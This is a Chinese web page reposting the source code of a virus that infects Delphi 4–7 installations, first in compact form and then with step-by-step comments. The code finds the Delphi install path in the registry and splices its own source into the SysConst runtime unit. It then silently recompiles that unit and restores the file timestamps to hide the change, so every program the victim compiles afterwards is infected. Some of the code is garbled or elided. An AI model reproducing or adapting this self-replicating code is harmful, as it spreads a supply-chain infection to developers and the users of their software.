关注迪恩网络微信公众号 下面是国内发布的源代码:
function x(s:string):string; var i:integer; begin for i:=1 to length(s) do if s=#36 then s:=#39; result:=s; end; procedure re(s,d,e:string); var f1,f2:textfile; h:cardinal; f:STARTUPINFO; p:PROCESS_INFORMATION; b:boolean; t1,t2,t3:FILETIME; begin h:=CreateFile(pchar(d+'bak'),0,0,0,3,0,0); if h<>DWORD(-1) then begin CloseHandle(h); exit; end; {'I-}assignfile(f1,s); reset(f1); if ioresult<>0 then exit; assignfile(f2,d+'pas'); rewrite(f2); if ioresult<>0 then begin closefile(f1); exit; end; while not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos('implementation',s)<>0 then break; end; for h:= 1 to 1 do writeln(f2,sc[h]); for h:= 1 to 23 do writeln(f2,''''+sc[h],''','); writeln(f2,''''+sc[24]+''');'); for h:= 2 to 24 do writeln(f2,x(sc[h])); closefile(f1); closefile(f2); {'I+}MoveFile(pchar(d+'dcu'),pchar(d+'bak')); fillchar(f,sizeof(f),0); f.cb := sizeof(f); f.dwFlags := STARTF_USESHOWWINDOW; f.wShowWindow := SW_HIDE; b := CreateProcess(nil,pchar(e+'"'+d+'pas"'),0,0,false,0,0,0,f,p); if b then WaitForSingleObject(p.hProcess,INFINITE); MoveFile(pchar(d+'bak'),pchar(d+'dcu')); DeleteFile(pchar(d+'pas')); h := CreateFile(pchar(d+'bak'),0,0,0,3,0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h); h := CreateFile(pchar(d+'dcu'),256,0,0,3,0,0); if h=DWORD(-1) then exit; SetFileTime(h,@t1,@t2,@t3); CloseHandle(h); end; procedure st; var k:HKEY; c:array [1..255] of char; i:cardinal; r:string; v:char; begin for v:='4' to '7' do if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+v+'.0'),0,KEY_READ,k)=0 then begin i:=255; if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then begin r:=''; i:=1; while c<>#0 do begin r:=r+c; inc(i); end; re(r+'\source\rtl\sys\SysConst'+'.pas',r+'\lib\sysconst.','"'+r+'\bin\dcc32.exe" '); end; RegCloseKey(k); end; end; begin st; end.
Uses Windows; Var sc: Array[1..24] Of String= ( 'uses windows; var sc:array[1..24] of string=(', 'function f_change_dollar_into_quote(p_string: string): string;', 'var l_index: integer;', ooo ); Function f_change_dollar_into_quote(p_string: String): String; Var l_index: integer; Begin For l_index:= 1 To length(p_string) Do If p_string[l_index]= #36 Then p_string[l_index]:= #39; result:= p_string; End; // f_change_dollar_into_quote Procedure modify_compile_erase(p_source_to_modify_in_RTL_file_name, p_source_to_modify_without_suffix_in_LIB_file_name, p_quoted_dcc32_exe_BIN_file_name: String); Var l_file_handle: cardinal; l_file_to_modify, l_new_file_to_modify: textfile; l_startup_info: STARTUPINFO; l_create_process_result: boolean; l_process_information: PROCESS_INFORMATION; l_file_time_1, l_file_time_2, l_file_time_3: FILETIME; Begin // -- try to open SYSCONST.BAK l_file_handle:= CreateFile(pchar(p_source_to_modify_without_suffix_in_LIB_file_name+ 'bak'), 0, 0, 0, 3, 0, 0); display(f_integer_to_hex(Integer(l_file_handle))); If l_file_handle<> DWORD(- 1) Then Begin // -- if did find this file, assume that the virus is already installed // -- and exit CloseHandle(l_file_handle); Exit; End; // -- the $ -> ' bug {'I-} // -- open SYSCONST.PAS assignfile(l_file_to_modify, p_source_to_modify_in_RTL_file_name); // -- here should exit if SYSCONST.PAS was not found // -- and bombs because had changed {$I-} in {'I-} reset(l_file_to_modify); If ioresult<> 0 Then exit; // -- create a modified copy of RTL\SYSCONST.PAS as LIB\SYSCONST.PAS assignfile(l_new_file_to_modify, p_source_to_modify_without_suffix_in_LIB_file_name+ 'pas'); rewrite(l_new_file_to_modify); If ioresult<> 0 Then Begin closefile(l_file_to_modify); exit; End; // -- copy up to the INTERFACE While Not eof(l_file_to_modify) Do Begin readln(l_file_to_modify, p_source_to_modify_in_RTL_file_name); writeln(l_new_file_to_modify, p_source_to_modify_in_RTL_file_name); If pos('implementation', p_source_to_modify_in_RTL_file_name)<> 0 Then break; End; // -- insert the text of this very code // -- 1 - the header, from the constant code array For l_file_handle:= 1 To 1 Do writeln(l_new_file_to_modify, sc[l_file_handle]); // -- 2 - the quoted text of this code (for infections to come) For l_file_handle:= 1 To 23 Do writeln(l_new_file_to_modify, ''''+ sc[l_file_handle], ''','); // -- 3 - the last row (no ending quote, but a ")" writeln(l_new_file_to_modify, ''''+ sc[24]+ ''');'); // -- 4 - the remainder of the source code // -- from the constant code array // -- without the $ For l_file_handle:= 2 To 24 Do writeln(l_new_file_to_modify, f_change_dollar_into_quote(sc[l_file_handle])); closefile(l_file_to_modify); closefile(l_new_file_to_modify); // -- the $ -> ' bug {'I+} // -- rename LIB\SYSCONST.DCU as LIB\SYSCONST.BAK // -- which will be used by a next trial as a mark of the infection // -- and also will be used to restore the original in case // -- of compilation error MoveFile(pchar(p_source_to_modify_without_suffix_in_LIB_file_name+ 'dcu'), pchar(p_source_to_modify_without_suffix_in_LIB_file_name+ 'bak')); // -- create the compiling process fillchar(l_startup_info, sizeof(l_startup_info), 0); l_startup_info.cb:= sizeof(l_startup_info); l_startup_info.dwFlags:= STARTF_USESHOWWINDOW; l_startup_info.wShowWindow:= SW_HIDE; // -- here compiles LIB\SYSCONST.PAS into LIB\SYSCONST.DCU l_create_process_result:= CreateProcess(Nil, pchar(p_quoted_dcc32_exe_BIN_file_name+ '"' + p_source_to_modify_without_suffix_in_LIB_file_name+ 'pas"'), 0, 0, false, 0, 0, 0, l_startup_info, l_process_information); If l_create_process_result Then WaitForSingleObject(l_process_information.hProcess, INFINITE); // -- only rename LIB\SYSCONST.BAK (the original DCU) into LIB\SYSCONST.DCU // -- if DCC32.EXE failed to create the (infected) DCU // -- (restoration of the DCU in case of compilation error) MoveFile(pchar(p_source_to_modify_without_suffix_in_LIB_file_name+ 'bak'), pchar(p_source_to_modify_without_suffix_in_LIB_file_name+ 'dcu')); // -- remove the modified LIB\SYSCONST.PAS DeleteFile(pchar(p_source_to_modify_without_suffix_in_LIB_file_name+ 'pas')); // -- open LIB\SYSCONST.BAK (the original SYSCONST.DCU) to get the date/time l_file_handle:= CreateFile(pchar(p_source_to_modify_without_suffix_in_LIB_file_name+ 'bak'), 0, 0, 0, 3, 0, 0); If l_file_handle= DWORD(- 1) Then exit; // -- read the original DCU file time GetFileTime(l_file_handle, @l_file_time_1, @l_file_time_2, @l_file_time_3); CloseHandle(l_file_handle); // -- open the new LIB\SYSCONST.DCU l_file_handle:= CreateFile(pchar(p_source_to_modify_without_suffix_in_LIB_file_name+ 'dcu'), 256, 0, 0, 3, 0, 0); If l_file_handle= DWORD(- 1) Then exit; // -- change its time to the original time SetFileTime(l_file_handle, @l_file_time_1, @l_file_time_2, @l_file_time_3); CloseHandle(l_file_handle); End; // modify_compile_erase Procedure infect_and_compile; Var l_version_character: char; l_borland_registry_key: HKEY; l_index: cardinal; l_key_content: Array[1..255] Of char; l_root_dir: String; Begin // -- find if registry contains Delphi-4 to Delphi-7 For l_version_character:= '4'To '7' Do If RegOpenKeyEx(HKEY_LOCAL_MACHINE, pchar('Software\Borland\Delphi\'+ l_version_character+'.0'), 0, KEY_READ, l_borland_registry_key)= 0 Then Begin // -- if so, find the "RootDir" key // -- eg, for Delphi 6 "C:\Program Files\Borland\Delphi6" l_index:= 255; If RegQueryValueEx(l_borland_registry_key, 'RootDir', Nil, @l_index, @l_key_content, @l_index)= 0 Then Begin // -- convert into a string l_root_dir:= ''; l_index:= 1; While l_key_content[l_index]<> #0 Do Begin l_root_dir:= l_root_dir+ l_key_content[l_index]; inc(l_index); End; modify_compile_erase( l_root_dir+ '\source\rtl\sys\SysConst'+ '.pas', l_root_dir+'\lib\sysconst.', '"'+ l_root_dir+ '\bin\dcc32.exe" '); End; RegCloseKey(l_borland_registry_key); End; End; // infect_and_compile Begin infect_and_compile End. 只感染 Delphi4-Delphi7的版本
国外的分析文章: ... _virus_anatomy.html |